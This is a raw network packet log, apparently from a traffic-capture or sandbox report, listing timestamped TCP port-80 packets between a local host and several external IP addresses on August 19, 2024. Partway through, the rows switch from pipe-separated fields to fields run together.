Aug 19, 2024 04:28:06.168071985 CEST | 80 | 61888 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:06.168123007 CEST | 80 | 61888 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:06.168159008 CEST | 80 | 61888 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:06.168190956 CEST | 80 | 61888 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:06.168190956 CEST | 61888 | 80 | 192.168.2.4 | 194.9.94.85
Aug 19, 2024 04:28:06.168229103 CEST | 80 | 61888 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:06.168261051 CEST | 80 | 61888 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:06.168262959 CEST | 61888 | 80 | 192.168.2.4 | 194.9.94.85
Aug 19, 2024 04:28:06.168317080 CEST | 61888 | 80 | 192.168.2.4 | 194.9.94.85
Aug 19, 2024 04:28:07.001920938 CEST | 61888 | 80 | 192.168.2.4 | 194.9.94.85
Aug 19, 2024 04:28:08.020503998 CEST | 61889 | 80 | 192.168.2.4 | 194.9.94.85
Aug 19, 2024 04:28:08.025599003 CEST | 80 | 61889 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:08.025674105 CEST | 61889 | 80 | 192.168.2.4 | 194.9.94.85
Aug 19, 2024 04:28:08.027833939 CEST | 61889 | 80 | 192.168.2.4 | 194.9.94.85
Aug 19, 2024 04:28:08.032953024 CEST | 80 | 61889 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:08.032983065 CEST | 80 | 61889 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:08.033111095 CEST | 80 | 61889 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:08.033137083 CEST | 80 | 61889 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:08.033163071 CEST | 80 | 61889 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:08.033209085 CEST | 80 | 61889 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:08.033235073 CEST | 80 | 61889 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:08.033277988 CEST | 80 | 61889 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:08.033303976 CEST | 80 | 61889 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:08.800591946 CEST | 80 | 61889 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:08.800633907 CEST | 80 | 61889 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:08.800712109 CEST | 80 | 61889 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:08.800729036 CEST | 61889 | 80 | 192.168.2.4 | 194.9.94.85
Aug 19, 2024 04:28:08.800749063 CEST | 80 | 61889 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:08.800781965 CEST | 80 | 61889 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:08.800806046 CEST | 61889 | 80 | 192.168.2.4 | 194.9.94.85
Aug 19, 2024 04:28:08.800832987 CEST | 80 | 61889 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:08.800863028 CEST | 80 | 61889 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:08.800899029 CEST | 80 | 61889 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:08.800932884 CEST | 61889 | 80 | 192.168.2.4 | 194.9.94.85
Aug 19, 2024 04:28:08.801207066 CEST | 61889 | 80 | 192.168.2.4 | 194.9.94.85
Aug 19, 2024 04:28:09.534018993 CEST | 61889 | 80 | 192.168.2.4 | 194.9.94.85
Aug 19, 2024 04:28:10.551801920 CEST | 61890 | 80 | 192.168.2.4 | 194.9.94.85
Aug 19, 2024 04:28:10.556843042 CEST | 80 | 61890 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:10.557974100 CEST | 61890 | 80 | 192.168.2.4 | 194.9.94.85
Aug 19, 2024 04:28:10.561928034 CEST | 61890 | 80 | 192.168.2.4 | 194.9.94.85
Aug 19, 2024 04:28:10.566770077 CEST | 80 | 61890 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:11.205013037 CEST | 80 | 61890 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:11.205059052 CEST | 80 | 61890 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:11.205094099 CEST | 80 | 61890 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:11.205125093 CEST | 80 | 61890 | 194.9.94.85 | 192.168.2.4
Aug 19, 2024 04:28:11.205159903 CEST | 80 | 61890 | 194.9.94.85 | 192.168.2.4
                Aug 19, 2024 04:28:11.205183029 CEST6189080192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:11.205193043 CEST8061890194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:11.205229044 CEST8061890194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:11.205280066 CEST6189080192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:11.205280066 CEST6189080192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:11.205389023 CEST6189080192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:11.214679956 CEST6189080192.168.2.4194.9.94.85
                Aug 19, 2024 04:28:11.219595909 CEST8061890194.9.94.85192.168.2.4
                Aug 19, 2024 04:28:16.796288967 CEST6189180192.168.2.423.251.54.212
                Aug 19, 2024 04:28:16.803108931 CEST806189123.251.54.212192.168.2.4
                Aug 19, 2024 04:28:16.806135893 CEST6189180192.168.2.423.251.54.212
                Aug 19, 2024 04:28:16.811882973 CEST6189180192.168.2.423.251.54.212
                Aug 19, 2024 04:28:16.816843033 CEST806189123.251.54.212192.168.2.4
                Aug 19, 2024 04:28:18.314367056 CEST6189180192.168.2.423.251.54.212
                Aug 19, 2024 04:28:18.359579086 CEST806189123.251.54.212192.168.2.4
                Aug 19, 2024 04:28:19.333920002 CEST6189280192.168.2.423.251.54.212
                Aug 19, 2024 04:28:19.338807106 CEST806189223.251.54.212192.168.2.4
                Aug 19, 2024 04:28:19.342020035 CEST6189280192.168.2.423.251.54.212
                Aug 19, 2024 04:28:19.346071959 CEST6189280192.168.2.423.251.54.212
                Aug 19, 2024 04:28:19.350888968 CEST806189223.251.54.212192.168.2.4
                Aug 19, 2024 04:28:20.846261024 CEST6189280192.168.2.423.251.54.212
                Aug 19, 2024 04:28:20.891495943 CEST806189223.251.54.212192.168.2.4
                Aug 19, 2024 04:28:21.878268957 CEST6189380192.168.2.423.251.54.212
                Aug 19, 2024 04:28:21.883819103 CEST806189323.251.54.212192.168.2.4
                Aug 19, 2024 04:28:21.883924007 CEST6189380192.168.2.423.251.54.212
                Aug 19, 2024 04:28:21.887839079 CEST6189380192.168.2.423.251.54.212
                Aug 19, 2024 04:28:21.894896984 CEST806189323.251.54.212192.168.2.4
                Aug 19, 2024 04:28:21.894952059 CEST806189323.251.54.212192.168.2.4
                Aug 19, 2024 04:28:21.894979954 CEST806189323.251.54.212192.168.2.4
                Aug 19, 2024 04:28:21.895005941 CEST806189323.251.54.212192.168.2.4
                Aug 19, 2024 04:28:21.895031929 CEST806189323.251.54.212192.168.2.4
                Aug 19, 2024 04:28:21.895077944 CEST806189323.251.54.212192.168.2.4
                Aug 19, 2024 04:28:21.895104885 CEST806189323.251.54.212192.168.2.4
                Aug 19, 2024 04:28:21.895132065 CEST806189323.251.54.212192.168.2.4
                Aug 19, 2024 04:28:21.895158052 CEST806189323.251.54.212192.168.2.4
                Aug 19, 2024 04:28:23.394048929 CEST6189380192.168.2.423.251.54.212
                Aug 19, 2024 04:28:23.443567038 CEST806189323.251.54.212192.168.2.4
                Aug 19, 2024 04:28:24.412590981 CEST6189480192.168.2.423.251.54.212
                Aug 19, 2024 04:28:24.417785883 CEST806189423.251.54.212192.168.2.4
                Aug 19, 2024 04:28:24.417855978 CEST6189480192.168.2.423.251.54.212
                Aug 19, 2024 04:28:24.420876026 CEST6189480192.168.2.423.251.54.212
                Aug 19, 2024 04:28:24.425764084 CEST806189423.251.54.212192.168.2.4
                Aug 19, 2024 04:28:38.209585905 CEST806189123.251.54.212192.168.2.4
                Aug 19, 2024 04:28:38.209654093 CEST6189180192.168.2.423.251.54.212
                Aug 19, 2024 04:28:40.710345030 CEST806189223.251.54.212192.168.2.4
                Aug 19, 2024 04:28:40.710495949 CEST6189280192.168.2.423.251.54.212
                Aug 19, 2024 04:28:43.283704996 CEST806189323.251.54.212192.168.2.4
                Aug 19, 2024 04:28:43.283853054 CEST6189380192.168.2.423.251.54.212
                Aug 19, 2024 04:28:45.803622961 CEST806189423.251.54.212192.168.2.4
                Aug 19, 2024 04:28:45.803747892 CEST6189480192.168.2.423.251.54.212
                Aug 19, 2024 04:28:45.804814100 CEST6189480192.168.2.423.251.54.212
                Aug 19, 2024 04:28:45.809722900 CEST806189423.251.54.212192.168.2.4
                Aug 19, 2024 04:28:50.849291086 CEST6189580192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:50.854239941 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:50.858470917 CEST6189580192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:50.861352921 CEST6189580192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:50.866235971 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.482146025 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.482197046 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.482266903 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.482297897 CEST6189580192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:51.482300043 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.482333899 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.482366085 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.482373953 CEST6189580192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:51.482398987 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.482435942 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.482466936 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.482487917 CEST6189580192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:51.482487917 CEST6189580192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:51.482501984 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.482765913 CEST6189580192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:51.487428904 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.487462997 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.487498045 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.487557888 CEST6189580192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:51.487857103 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.487952948 CEST6189580192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:51.572577000 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.572618008 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.572654963 CEST8061895199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:51.572689056 CEST6189580192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:51.572760105 CEST6189580192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:52.361337900 CEST6189580192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:53.380055904 CEST6189680192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:53.385113955 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:53.388029099 CEST6189680192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:53.391957045 CEST6189680192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:53.396830082 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:53.995450974 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:53.995497942 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:53.995533943 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:53.995546103 CEST6189680192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:53.995568037 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:53.995600939 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:53.995613098 CEST6189680192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:53.995634079 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:53.995666981 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:53.995682955 CEST6189680192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:53.995719910 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:53.995752096 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:53.995757103 CEST6189680192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:53.995785952 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:53.995826960 CEST6189680192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:54.000701904 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:54.000735998 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:54.000771046 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:54.000780106 CEST6189680192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:54.048733950 CEST6189680192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:54.082446098 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:54.082482100 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:54.082518101 CEST8061896199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:54.082525015 CEST6189680192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:54.082561016 CEST6189680192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:54.894254923 CEST6189680192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:55.911107063 CEST6189780192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:55.916208982 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:55.916316032 CEST6189780192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:55.918767929 CEST6189780192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:55.925955057 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:55.925985098 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:55.926011086 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:55.926253080 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:55.926280022 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:55.926357985 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:55.926449060 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:55.926480055 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:55.926506996 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.555280924 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.555306911 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.555325031 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.555344105 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.555372000 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.555387974 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.555406094 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.555419922 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.555435896 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.555453062 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.555568933 CEST6189780192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:56.555568933 CEST6189780192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:56.555569887 CEST6189780192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:56.555569887 CEST6189780192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:56.555569887 CEST6189780192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:56.560779095 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.560803890 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.560833931 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.560869932 CEST6189780192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:56.611258030 CEST6189780192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:56.644129038 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.644171000 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.644224882 CEST8061897199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:56.650196075 CEST6189780192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:57.423825979 CEST6189780192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:58.443744898 CEST6189880192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:58.449012995 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:58.449098110 CEST6189880192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:58.451304913 CEST6189880192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:58.456258059 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.083702087 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.083745003 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.083781004 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.083815098 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.083848000 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.083880901 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.083914042 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.083930969 CEST6189880192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:59.083949089 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.083981037 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.083997011 CEST6189880192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:59.084016085 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.084019899 CEST6189880192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:59.084223032 CEST6189880192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:59.088929892 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.088963985 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.089019060 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.089052916 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.089097977 CEST6189880192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:59.089193106 CEST6189880192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:59.171840906 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.171874046 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.171911001 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:28:59.172020912 CEST6189880192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:59.172020912 CEST6189880192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:59.174406052 CEST6189880192.168.2.4199.192.19.19
                Aug 19, 2024 04:28:59.179238081 CEST8061898199.192.19.19192.168.2.4
                Aug 19, 2024 04:29:04.237011909 CEST6189980192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:04.241884947 CEST8061899213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:04.241955996 CEST6189980192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:04.244107962 CEST6189980192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:04.248965979 CEST8061899213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:04.930221081 CEST8061899213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:04.930280924 CEST8061899213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:04.930332899 CEST8061899213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:04.930341005 CEST6189980192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:04.933170080 CEST8061899213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:04.933219910 CEST6189980192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:04.933331013 CEST8061899213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:04.933378935 CEST6189980192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:05.754650116 CEST6189980192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:06.771672010 CEST6190080192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:06.778660059 CEST8061900213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:06.778743029 CEST6190080192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:06.780891895 CEST6190080192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:06.785844088 CEST8061900213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:07.504302025 CEST8061900213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:07.504343987 CEST8061900213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:07.504379034 CEST8061900213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:07.504399061 CEST6190080192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:07.507680893 CEST8061900213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:07.507728100 CEST8061900213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:07.507742882 CEST6190080192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:07.507774115 CEST6190080192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:08.283960104 CEST6190080192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:09.325824022 CEST6190180192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:09.331140041 CEST8061901213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:09.331212044 CEST6190180192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:09.334495068 CEST6190180192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:09.339524031 CEST8061901213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:09.339553118 CEST8061901213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:09.339581013 CEST8061901213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:09.339607000 CEST8061901213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:09.339654922 CEST8061901213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:09.339679956 CEST8061901213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:09.339706898 CEST8061901213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:09.339752913 CEST8061901213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:09.339777946 CEST8061901213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:10.035621881 CEST8061901213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:10.035643101 CEST8061901213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:10.035659075 CEST8061901213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:10.035671949 CEST8061901213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:10.035756111 CEST6190180192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:10.035830021 CEST6190180192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:10.041949034 CEST8061901213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:10.042282104 CEST8061901213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:10.042462111 CEST6190180192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:10.845726967 CEST6190180192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:11.867942095 CEST6190280192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:11.873071909 CEST8061902213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:11.873204947 CEST6190280192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:11.877254009 CEST6190280192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:11.882077932 CEST8061902213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:12.619221926 CEST8061902213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:12.619275093 CEST8061902213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:12.619313002 CEST8061902213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:12.619340897 CEST6190280192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:12.624816895 CEST8061902213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:12.624936104 CEST8061902213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:12.625051022 CEST6190280192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:12.627655029 CEST6190280192.168.2.4213.145.228.16
                Aug 19, 2024 04:29:12.632534981 CEST8061902213.145.228.16192.168.2.4
                Aug 19, 2024 04:29:17.710206032 CEST6190380192.168.2.491.195.240.19
                Aug 19, 2024 04:29:17.715148926 CEST806190391.195.240.19192.168.2.4
                Aug 19, 2024 04:29:17.719985962 CEST6190380192.168.2.491.195.240.19
                Aug 19, 2024 04:29:17.719985962 CEST6190380192.168.2.491.195.240.19
                Aug 19, 2024 04:29:17.724987984 CEST806190391.195.240.19192.168.2.4
                Aug 19, 2024 04:29:18.367764950 CEST806190391.195.240.19192.168.2.4
                Aug 19, 2024 04:29:18.367917061 CEST806190391.195.240.19192.168.2.4
                Aug 19, 2024 04:29:18.369749069 CEST6190380192.168.2.491.195.240.19
                Aug 19, 2024 04:29:19.236376047 CEST6190380192.168.2.491.195.240.19
                Aug 19, 2024 04:29:20.255986929 CEST6190480192.168.2.491.195.240.19
                Aug 19, 2024 04:29:20.260992050 CEST806190491.195.240.19192.168.2.4
                Aug 19, 2024 04:29:20.264329910 CEST6190480192.168.2.491.195.240.19
                Aug 19, 2024 04:29:20.267699957 CEST6190480192.168.2.491.195.240.19
                Aug 19, 2024 04:29:20.272589922 CEST806190491.195.240.19192.168.2.4
                Aug 19, 2024 04:29:20.919342041 CEST806190491.195.240.19192.168.2.4
                Aug 19, 2024 04:29:20.919696093 CEST806190491.195.240.19192.168.2.4
                Aug 19, 2024 04:29:20.919755936 CEST6190480192.168.2.491.195.240.19
                Aug 19, 2024 04:29:21.767734051 CEST6190480192.168.2.491.195.240.19
                Aug 19, 2024 04:29:22.796919107 CEST6190580192.168.2.491.195.240.19
                Aug 19, 2024 04:29:22.801871061 CEST806190591.195.240.19192.168.2.4
                Aug 19, 2024 04:29:22.801949024 CEST6190580192.168.2.491.195.240.19
                Aug 19, 2024 04:29:22.832972050 CEST6190580192.168.2.491.195.240.19
                Aug 19, 2024 04:29:22.837878942 CEST806190591.195.240.19192.168.2.4
                Aug 19, 2024 04:29:22.838073969 CEST806190591.195.240.19192.168.2.4
                Aug 19, 2024 04:29:22.838102102 CEST806190591.195.240.19192.168.2.4
                Aug 19, 2024 04:29:22.838150978 CEST806190591.195.240.19192.168.2.4
                Aug 19, 2024 04:29:22.838176966 CEST806190591.195.240.19192.168.2.4
                Aug 19, 2024 04:29:22.838263988 CEST806190591.195.240.19192.168.2.4
                Aug 19, 2024 04:29:22.838291883 CEST806190591.195.240.19192.168.2.4
                Aug 19, 2024 04:29:22.838318110 CEST806190591.195.240.19192.168.2.4
                Aug 19, 2024 04:29:22.838349104 CEST806190591.195.240.19192.168.2.4
                Aug 19, 2024 04:29:23.470873117 CEST806190591.195.240.19192.168.2.4
                Aug 19, 2024 04:29:23.565105915 CEST806190591.195.240.19192.168.2.4
                Aug 19, 2024 04:29:23.565166950 CEST6190580192.168.2.491.195.240.19
                Aug 19, 2024 04:29:24.345724106 CEST6190580192.168.2.491.195.240.19
                Aug 19, 2024 04:29:25.364779949 CEST6190680192.168.2.491.195.240.19
                Aug 19, 2024 04:29:25.371200085 CEST806190691.195.240.19192.168.2.4
                Aug 19, 2024 04:29:25.371283054 CEST6190680192.168.2.491.195.240.19
                Aug 19, 2024 04:29:25.373101950 CEST6190680192.168.2.491.195.240.19
                Aug 19, 2024 04:29:25.378011942 CEST806190691.195.240.19192.168.2.4
                Aug 19, 2024 04:29:26.072212934 CEST806190691.195.240.19192.168.2.4
                Aug 19, 2024 04:29:26.072257996 CEST806190691.195.240.19192.168.2.4
                Aug 19, 2024 04:29:26.074038029 CEST6190680192.168.2.491.195.240.19
                Aug 19, 2024 04:29:26.085258961 CEST6190680192.168.2.491.195.240.19
                Aug 19, 2024 04:29:26.090238094 CEST806190691.195.240.19192.168.2.4
                Aug 19, 2024 04:29:39.178483009 CEST6190780192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:39.183495998 CEST8061907104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:39.183558941 CEST6190780192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:39.185808897 CEST6190780192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:39.190648079 CEST8061907104.21.45.56192.168.2.4
                Aug 19, 2024 04:29:40.691998005 CEST6190780192.168.2.4104.21.45.56
                Aug 19, 2024 04:29:40.697284937 CEST8061907104.21.45.56192.168.2.4
